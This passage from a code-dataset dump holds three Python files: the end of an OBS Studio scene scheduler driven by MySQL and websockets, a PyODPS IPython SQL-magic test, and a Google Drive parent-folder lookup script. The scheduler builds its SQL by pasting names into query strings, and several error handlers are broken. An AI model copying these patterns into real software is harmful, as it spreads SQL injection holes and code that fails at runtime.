row[\"pass\"]\nexcept Error as e:\n\tprint(\"Error while connecting to MySQL\", e)\n\tif writelog:\n\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": Error while connecting to MySQL\" + e)\n\t\ntry:\n\tconnectionthread = mysql.connector.connect(**mysqlconfig)\n\tif connectionthread.is_connected():\n\t\tdb_Info = connectionthread.get_server_info()\n\t\tprint(\"Thread connected to MySQL Server version \", db_Info)\n\t\tif writelog:\n\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": Thread connected to MySQL Server version \" + db_Info)\nexcept Error as e:\n\tprint(\"Error while connecting to MySQL\", e)\n\tif writelog:\n\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": Error while connecting thread to MySQL\" + e)\n\n\nStudioMode = False\nobsconnected = False\nexporttime = [0,500,1000,1500,2000,2500,3000,3500,4000,4500,5000,5500]\n#exporttime = [0,1000,2000,3000,4000,5000] # every hour at mmss. 100 = 1 minute after each hour, 1500 = 15 minutes after each hour.\n#[0,1000,2000,3000,4000,5000] = export every 10 minutes\nGetAuthRequired = {\"request-type\" : \"GetAuthRequired\" ,\"message-id\" : \"1\"};\nGetStudioModeStatus = {\"request-type\" : \"GetStudioModeStatus\" , \"message-id\" : \"GetStudioModeStatus\"}\nGetSceneList = {\"request-type\" : \"GetSceneList\" , \"message-id\" : \"getSceneList\"}\nGetSourcesList = {\"request-type\" : \"GetSourcesList\" , \"message-id\" : \"GetSourcesList\"}\nGetTransitionList = {\"request-type\": \"GetTransitionList\",\"message-id\" : \"GetTransitionList\"}\n\nwhile True:\n\ttry:\n\t\tdef on_message(ws, message):\n\t\t\tdata = json.loads(message)\n\t\t\t#print (data[\"message-id\"])\n\t\t\t#print (data)\n\t\t\tglobal obsconnected\n\t\t\tif \"error\" in data:\n\t\t\t\tif (data[\"error\"] == \"Authentication Failed.\"):\n\t\t\t\t\tprint(\"Authentication Failed.\")\n\t\t\t\t\tif writelog:\n\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": Authentication Failed.\")\n\t\t\t\t\tws.keep_running = False\n\t\t\t\telse:\n\t\t\t\t\tprint (data)\n\t\t\t\t\tmessage = str(data)\n\t\t\t\t\tif writelog:\n\t\t\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + message)\n\t\t\telif \"message-id\" in data:\n\t\t\t\tif (data[\"message-id\"] == \"GetStudioModeStatus\"):\n\t\t\t\t\tglobal StudioMode\n\t\t\t\t\tStudioMode = data[\"studio-mode\"]\n\t\t\t\telif (data[\"message-id\"] == \"getSceneList\"):\n\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\tmycursor.execute(\"TRUNCATE TABLE scenenames\")\n\t\t\t\t\tconnection.commit()\n\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\tmycursor.execute(\"TRUNCATE TABLE sourcenames\")\n\t\t\t\t\tconnection.commit()\n\t\t\t\t\tfor name in data['scenes']:\n\t\t\t\t\t\tscene = name['name']\n\t\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\t\tqry = \"INSERT INTO scenenames(scene) VALUES('\" + scene + \"')\"\n\t\t\t\t\t\tmycursor.execute(qry)\n\t\t\t\t\t\tconnection.commit()\n\t\t\t\t\t\tfor name in name['sources']:\n\t\t\t\t\t\t\tsourcename = name['name']\n\t\t\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\t\t\tqry = \"INSERT INTO sourcenames(scene,source) VALUES('\" + scene + \"' , '\" + sourcename + \"')\"\n\t\t\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\t\tmycursor.execute(qry)\n\t\t\t\t\t\t\tconnection.commit()\n\t\t\t\telif (data[\"message-id\"] == \"GetTransitionList\"):\n\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\tmycursor.execute(\"TRUNCATE TABLE transitionnames\")\n\t\t\t\t\tconnection.commit()\n\t\t\t\t\tfor i in data['transitions']:\n\t\t\t\t\t\ttrans_type = i['name']\n\t\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\t\tqry = \"INSERT INTO transitionnames(transition) VALUES('\" + trans_type + \"')\"\n\t\t\t\t\t\tmycursor.execute(qry)\n\t\t\t\t\t\tconnection.commit()\n\t\t\t\telif (data[\"message-id\"] == \"SetCurrentTransition\"):\n\t\t\t\t\tprint(\"SetCurrentTransition\")\n\t\t\t\t#elif (data[\"authRequired\"]):\n\t\t\t\telif (data[\"message-id\"] == \"1\"):\n\t\t\t\t\tprint(\"Authentication required\")\n\t\t\t\t\tsecret = base64.b64encode(hashlib.sha256((password + data['salt']).encode('utf-8')).digest())\n\t\t\t\t\tauth = base64.b64encode(hashlib.sha256(secret + data['challenge'].encode('utf-8')).digest()).decode('utf-8')\n\t\t\t\t\tauth_payload = {\"request-type\": \"Authenticate\", \"message-id\": \"2\", \"auth\": auth}\n\t\t\t\t\tws.send(json.dumps(auth_payload))\n\t\t\t\t\tobsconnected = True\n\t\t\t\telif (data[\"message-id\"] == \"2\"):\n\t\t\t\t\tprint(\"Login pass\")\n\t\t\t\telif (data[\"message-id\"] == \"SetCurrentScene\") or (data[\"message-id\"] == \"SetSceneItemProperties\") or (data[\"message-id\"] == \"SetPreviewScene\") :\n\t\t\t\t\tTrue\n\t\t\t\telse:\n\t\t\t\t\tprint(data)\n\t\t\t\t\tmessage = str(data)\n\t\t\t\t\tif writelog:\n\t\t\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + message)\n\t\t\t\t\tobsconnected = True\n\t\t\telif \"update-type\" in message:\n\t\t\t\tif (data[\"update-type\"] == \"StudioModeSwitched\"):\n\t\t\t\t\tStudioMode = data[\"new-state\"]\n\n\t\tdef on_error(ws, error):\n\t\t\tprint(error)\n\t\t\tif writelog:\n\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + str(error))\n\t\t\tws.close()\n\n\t\tdef on_close(ws):\n\t\t\tprint(\"On Close Connection error.\")\n\t\t\tif writelog:\n\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": On Close Connection error.\")\n\t\t\t#stop on_open while loop\n\t\t\tglobal obsconnected\n\t\t\tobsconnected = False\n\t\t\tws.keep_running = False\n\t\t\ttime.sleep(30)\n\n\t\tdef on_open(ws):\n\t\t\tdef run(*args):\n\t\t\t\tws.send(json.dumps(GetAuthRequired))\n\t\t\t\ttime.sleep(2)\n\t\t\t\tif ws.sock:\n\t\t\t\t\tws.send(json.dumps(GetStudioModeStatus))\n\t\t\t\t\tglobal obsconnected\n\t\t\t\t\tweekdays = (\"ma\",\"di\",\"wo\",\"do\",\"vr\",\"za\",\"zo\") #Dutch\n\t\t\t\t\twhile obsconnected == True:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tdayrun = False\n\t\t\t\t\t\t\tcurrentdtime = time.strftime(\"%Y%m%d%H%M%S\",time.localtime())\n\t\t\t\t\t\t\ttimenow = time.strftime(\"%H:%M:%S\",time.localtime())\n\t\t\t\t\t\t\tif not connectionthread.is_connected():\n\t\t\t\t\t\t\t\tconnectionthread.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\t\tmycursor = connectionthread.cursor(dictionary=True)\n\t\t\t\t\t\t\tgetqry = \"SELECT * FROM schedules WHERE processed = 0\"\n\t\t\t\t\t\t\tmycursor.execute(getqry)\n\t\t\t\t\t\t\trecords = mycursor.fetchall()\n\t\t\t\t\t\t\tprint(time.strftime(\"%H:%M:%S\",time.localtime()))\n\t\t\t\t\t\t\tfor row in records:\n\t\t\t\t\t\t\t\tlogrow = str(row)\n\t\t\t\t\t\t\t\tid = row[\"id\"]\n\t\t\t\t\t\t\t\tswtime = row[\"swtime\"]\n\t\t\t\t\t\t\t\tswdate = row[\"swdate\"]\n\t\t\t\t\t\t\t\ttime_object = datetime.strptime(str(swtime), '%H:%M:%S').time()\n\t\t\t\t\t\t\t\tdate_object = datetime.strptime(str(swdate), '%Y-%m-%d').date()\n\t\t\t\t\t\t\t\tdatetime_str = datetime.combine(date_object , time_object)\n\t\t\t\t\t\t\t\tdtime = datetime_str.strftime(\"%Y%m%d%H%M%S\")\n\t\t\t\t\t\t\t\tscene = row[\"scene\"]\n\t\t\t\t\t\t\t\ttrans_type = row[\"transition\"]\n\t\t\t\t\t\t\t\tsourceoff = row[\"sourceoff\"] #source in this scene to switch off\n\t\t\t\t\t\t\t\tsourceon = row[\"sourceon\"] #source in this scene to switch on\n\t\t\t\t\t\t\t\trepeattime = row[\"repeattime\"]\n\t\t\t\t\t\t\t\tscenesourceoff = row[\"scenesourceoff\"]\n\t\t\t\t\t\t\t\tscenesourceon = row[\"scenesourceon\"]\n\t\t\t\t\t\t\t\tif timenow == datetime_str.strftime(\"%H:%M:%S\"):\n\t\t\t\t\t\t\t\t\tif weekdays[datetime.today().weekday()] in repeattime:\n\t\t\t\t\t\t\t\t\t\tdayrun = True\n\t\t\t\t\t\t\t\tif currentdtime == dtime or dayrun:\n\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logrow)\n\t\t\t\t\t\t\t\t\tif len(sourceon) > 0:\n\t\t\t\t\t\t\t\t\t\t#first set correct scene in preview\n\t\t\t\t\t\t\t\t\t\tmessage = {\"request-type\" : \"SetPreviewScene\" , \"message-id\" : \"SetPreviewScene\" , \"scene-name\" : scenesourceon};\n\t\t\t\t\t\t\t\t\t\tlogmessage = str(message)\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logmessage)\n\t\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\t\t#set source properties\n\t\t\t\t\t\t\t\t\t\tmessage={\"request-type\" : \"SetSceneItemProperties\" , \"message-id\" : \"SetSceneItemProperties\" , \"scene-name\" : scenesourceon , \"item\" : sourceon , \"visible\": True };\n\t\t\t\t\t\t\t\t\t\tlogmessage = str(message)\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logmessage)\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\tif len(sourceoff) > 0:\n #delay,else to fast for OBS\n\t\t\t\t\t\t\t\t\t\ttime.sleep(2)\n\t\t\t\t\t\t\t\t\t\tmessage = {\"request-type\" : \"SetPreviewScene\" , \"message-id\" : \"SetPreviewScene\" , \"scene-name\" : scenesourceoff};\n\t\t\t\t\t\t\t\t\t\tlogmessage = str(message)\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logmessage)\n\t\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\t\tmessage={\"request-type\" : \"SetSceneItemProperties\" , \"message-id\" : \"SetSceneItemProperties\" , \"scene-name\" : scenesourceoff , \"item\" : sourceoff , \"visible\": False };\n\t\t\t\t\t\t\t\t\t\tlogmessage = str(message)\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logmessage)\n\t\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\tmessage={\"request-type\" : \"SetCurrentTransition\" , \"message-id\" : \"SetCurrentTransition\" ,\"transition-name\":trans_type};\n\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\tmessage = {\"request-type\" : \"SetCurrentScene\" , \"message-id\" : \"SetCurrentScene\" , \"scene-name\" : scene};\n\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tif not connectionthread.is_connected():\n\t\t\t\t\t\t\t\t\t\tconnectionthread.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\t\t\t\tmycursor = connectionthread.cursor()\n\t\t\t\t\t\t\t\t\tif len(repeattime) > 0 and not dayrun:\n\t\t\t\t\t\t\t\t\t\tif \",\" in repeattime:\n\t\t\t\t\t\t\t\t\t\t\trepeattimenew = repeattime.split(',')[0]\n\t\t\t\t\t\t\t\t\t\t\trepeattimenumber = repeattime.split(',')[1]\n\t\t\t\t\t\t\t\t\t\t\tif repeattimenumber == \"0\": #continuous\n\t\t\t\t\t\t\t\t\t\t\t\tnewdtime = datetime_str + timedelta(minutes=int(repeattimenew))\n\t\t\t\t\t\t\t\t\t\t\t\tnew_time_object = datetime.time(newdtime)\n\t\t\t\t\t\t\t\t\t\t\t\tnew_date_object = datetime.date(newdtime)\n\t\t\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET swtime = '\" + new_time_object.strftime(\"%H:%M:%S\") + \"', swdate ='\" + new_date_object.strftime(\"%Y-%m-%d\") + \"' WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\t\t\telif repeattimenumber == \"1\": #last run was done\n\t\t\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET processed = 1 WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\tnewdtime = datetime_str + timedelta(minutes=int(repeattimenew))\n\t\t\t\t\t\t\t\t\t\t\t\trepeattime = repeattimenew + \",\" + str(int(repeattimenumber) - 1)\n\t\t\t\t\t\t\t\t\t\t\t\tnew_time_object = datetime.time(newdtime)\n\t\t\t\t\t\t\t\t\t\t\t\tnew_date_object = datetime.date(newdtime)\n\t\t\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET swtime = '\" + new_time_object.strftime(\"%H:%M:%S\") + \"', swdate = '\" + new_date_object.strftime(\"%Y-%m-%d\") + \"', repeattime = '\" + repeattime + \"' WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\tnewdtime = datetime_str + timedelta(minutes=int(repeattime))\n\t\t\t\t\t\t\t\t\t\t\tnew_time_object = datetime.time(newdtime)\n\t\t\t\t\t\t\t\t\t\t\tnew_date_object = datetime.date(newdtime)\n\t\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET swtime = '\" + new_time_object.strftime(\"%H:%M:%S\") + \"', swdate ='\" + new_date_object.strftime(\"%Y-%m-%d\") + \"' WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET processed = 1 WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\tif not dayrun:\n\t\t\t\t\t\t\t\t\t\tmycursor.execute(qry)\n\t\t\t\t\t\t\t\t\t\tconnectionthread.commit()\n\t\t\t\t\t\t\t\t\tprint(\"Transition to: \" + scene + \" at \" + time.strftime(\"%H:%M:%S\",time.localtime()))\n\t\t\t\t\t\t\t\t\tif writelog:\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": Transition to: \" + scene + \" at \" + time.strftime(\"%H:%M:%S\",time.localtime()))\n\t\t\t\t\t\t\t\t\ttime.sleep(1) #wait for next second.\n\t\t\t\t\t\t\tconnectionthread.close()\n\t\t\t\t\t\t\ttime.sleep(0.25) #no need 100's loops a second\n\t\t\t\t\t\texcept Exception:\n\t\t\t\t\t\t\tprint(\"connectionthread error\")\n\t\t\t\t\t\t\tconnectionthread.close()\n\t\t\t\t\t\t\tif writelog:\n\t\t\t\t\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": connectionthread error\")\n\t\t\t\t\t\t\ttime.sleep(10)\n\t\t\t\t\t\ttimenow = int(time.strftime(\"%M%S\",time.localtime()))\n\t\t\t\t\t\tif timenow in exporttime:\n\t\t\t\t\t\t\tprint(\"export scenes\")\n\t\t\t\t\t\t\tws.send(json.dumps(GetSceneList))\n\t\t\t\t\t\t\tUpdatescenes = False\n\t\t\t\t\t\t\ttime.sleep(0.25)\n\t\t\t\t\t\tif timenow - 10 in exporttime:\n\t\t\t\t\t\t\tprint(\"export transitions\")\n\t\t\t\t\t\t\tws.send(json.dumps(GetTransitionList))\n\t\t\t\t\t\t\ttime.sleep(0.25)\n\t\t\tthread.start_new_thread(run, ())\n\n\t\tif __name__ == \"__main__\":\n\t\t\t#websocket.enableTrace(True)\n\t\t\tws = websocket.WebSocketApp(\"ws://{}:{}\".format(host, port),on_message = on_message,on_error = on_error,on_close = on_close)\n\t\t\tws.on_open = on_open\n\t\t\tws.run_forever()\n\n\texcept Exception:\n\t\tprint(\"Exception Connection error\")\n\t\tif writelog:\n\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": Exception Connection error\")\n\t\ttime.sleep(10)\n\n\n\n\n\n", "sub_path": "obsschedulermySQL.py", "file_name": "obsschedulermySQL.py", "file_ext": "py", "file_size_in_byte": 13499, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sys.argv", "line_number": 33, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 41, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 41, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 41, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 42, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 45, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 45, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 45, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 50, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 50, "usage_type": "call"}, {"api_name": "mysql.connector.Error", "line_number": 58, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 61, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 61, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 64, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 64, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 64, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 69, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 69, "usage_type": "call"}, {"api_name": "mysql.connector.Error", "line_number": 70, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 73, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 73, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 90, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 98, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 98, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 104, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 104, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 153, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 153, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 154, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 154, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 156, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 166, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 166, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 175, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 175, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 181, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 181, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 186, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 190, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 191, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 193, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 199, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 199, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 200, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 200, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 207, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 207, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 213, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 213, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 214, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 214, "usage_type": "name"}, {"api_name": "datetime.datetime.combine", "line_number": 215, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 215, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 225, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 225, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 228, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 228, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 233, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 233, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 234, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 238, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 238, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 239, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 242, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 245, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 245, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 246, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 249, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 249, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 250, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 252, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 254, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 264, "usage_type": "call"}, {"api_name": "datetime.datetime.time", "line_number": 265, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 265, "usage_type": "name"}, {"api_name": "datetime.datetime.date", "line_number": 266, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 266, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 271, "usage_type": "call"}, {"api_name": "datetime.datetime.time", "line_number": 273, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 273, "usage_type": "name"}, {"api_name": "datetime.datetime.date", "line_number": 274, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 274, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 277, "usage_type": "call"}, {"api_name": "datetime.datetime.time", "line_number": 278, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 278, "usage_type": "name"}, {"api_name": "datetime.datetime.date", "line_number": 279, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 279, "usage_type": "name"}, {"api_name": "time.strftime", "line_number": 286, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 286, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 288, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 288, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 288, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 289, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 291, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 296, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 296, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 297, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 298, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 298, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 301, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 303, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 306, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 307, "usage_type": "call"}, {"api_name": "_thread.start_new_thread", "line_number": 308, "usage_type": "call"}, {"api_name": "websocket.WebSocketApp", "line_number": 312, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 319, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 319, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 320, "usage_type": "call"}]} {"seq_id": "282783314", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Copyright 1999-2017 Alibaba Group Holding Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom collections import namedtuple\n\nfrom odps.config import options\nfrom odps.tests.core import TestBase, tn\nfrom odps.compat import unittest\nfrom odps.ipython.magics import ODPSSql\n\ntry:\n import IPython\n has_ipython = True\nexcept ImportError:\n has_ipython = False\n\n\nclass Test(TestBase):\n def setUp(self):\n super(Test, self).setUp()\n self.old_use_instance_tunnel = options.tunnel.use_instance_tunnel\n\n def tearDown(self):\n super(Test, self).tearDown()\n options.tunnel.use_instance_tunnel = self.old_use_instance_tunnel\n\n @unittest.skipIf(not has_ipython, 'Skipped when no IPython is detected.')\n def testExecuteSql(self):\n FakeShell = namedtuple('FakeShell', 'user_ns')\n\n magic_class = ODPSSql(FakeShell(user_ns={}))\n magic_class._odps = self.odps\n\n test_table_name = tn('pyodps_t_test_sql_magic')\n test_content = [['line1'], ['line2']]\n self.odps.delete_table(test_table_name, if_exists=True)\n self.odps.create_table(test_table_name, 'col string', lifecycle=1)\n self.odps.write_table(test_table_name, test_content)\n\n options.tunnel.use_instance_tunnel = False\n result = magic_class.execute('select * from %s' % test_table_name)\n self.assertListEqual(self._get_result(result), test_content)\n\n options.tunnel.use_instance_tunnel = True\n result = magic_class.execute('select * from %s' % test_table_name)\n self.assertListEqual(self._get_result(result), test_content)\n\n result = magic_class.execute('show tables')\n self.assertTrue(len(result) > 0)\n\n table_name = tn('pyodps_test_magics_create_table_result')\n magic_class.execute('create table %s (col string) lifecycle 1' % table_name)\n magic_class.execute('drop table %s' % table_name)\n", "sub_path": "odps/ipython/tests/test_magics.py", "file_name": "test_magics.py", "file_ext": "py", "file_size_in_byte": 2460, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "odps.tests.core.TestBase", "line_number": 31, "usage_type": "name"}, {"api_name": "odps.config.options.tunnel", "line_number": 34, "usage_type": "attribute"}, {"api_name": "odps.config.options", "line_number": 34, "usage_type": "name"}, {"api_name": "odps.config.options.tunnel", "line_number": 38, "usage_type": "attribute"}, {"api_name": "odps.config.options", "line_number": 38, "usage_type": "name"}, {"api_name": "collections.namedtuple", "line_number": 42, "usage_type": "call"}, {"api_name": "odps.ipython.magics.ODPSSql", "line_number": 44, "usage_type": "call"}, {"api_name": "odps.tests.core.tn", "line_number": 47, "usage_type": "call"}, {"api_name": "odps.config.options.tunnel", "line_number": 53, "usage_type": "attribute"}, {"api_name": "odps.config.options", "line_number": 53, "usage_type": "name"}, {"api_name": "odps.config.options.tunnel", "line_number": 57, "usage_type": "attribute"}, {"api_name": "odps.config.options", "line_number": 57, "usage_type": "name"}, {"api_name": "odps.tests.core.tn", "line_number": 64, "usage_type": "call"}, {"api_name": "odps.compat.unittest.skipIf", "line_number": 40, "usage_type": "call"}, {"api_name": "odps.compat.unittest", "line_number": 40, "usage_type": "name"}]} {"seq_id": "645543240", "text": "\n###########################################\n# DSFG ~ Katie House ~ 8/14/18\n# DESCTIPTION: List Google Drive links for Automan\n# INPUT: Google Drive File ID\n# OUTPUT: Google Drive Folder ID\n###########################################\n\nfrom __future__ import print_function\nfrom apiclient.discovery import build\nfrom httplib2 import Http\nfrom oauth2client import file as oauth_file, client, tools\nfrom apiclient import errors\n\n\ndef print_parents(service, file_id):\n \"\"\"Print a file's parents.\n\n Args:\n service: Drive API service instance.\n file_id: ID of the file to print parents for.\n \"\"\"\n try:\n parents = service.parents().list(fileId=file_id).execute()\n for parent in parents['items']:\n print('File Id: %s' % parent['id'])\n except error:\n print('An error occurred: %s' % error)\n\ndef main(): \n store = oauth_file.Storage('token.json')\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets('credentials.json', SCOPES)\n creds = tools.run_flow(flow, store)\n service = build('drive', 'v2', http=creds.authorize(Http()))\n\n # List all image links in a .txt file\n print_parents(service, '1_3g_aKodcJxYnuMZObePMN77AjnQlBmM')\n \nif __name__ == '__main__':\n main()\n ", "sub_path": "preprocessing/townhall-data/links-for-automan/get-folder-id.py", "file_name": "get-folder-id.py", "file_ext": "py", "file_size_in_byte": 1269, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "oauth2client.file.Storage", "line_number": 31, "usage_type": "call"}, {"api_name": "oauth2client.file", "line_number": 31, "usage_type": "name"}, {"api_name": "oauth2client.client.flow_from_clientsecrets", "line_number": 34, 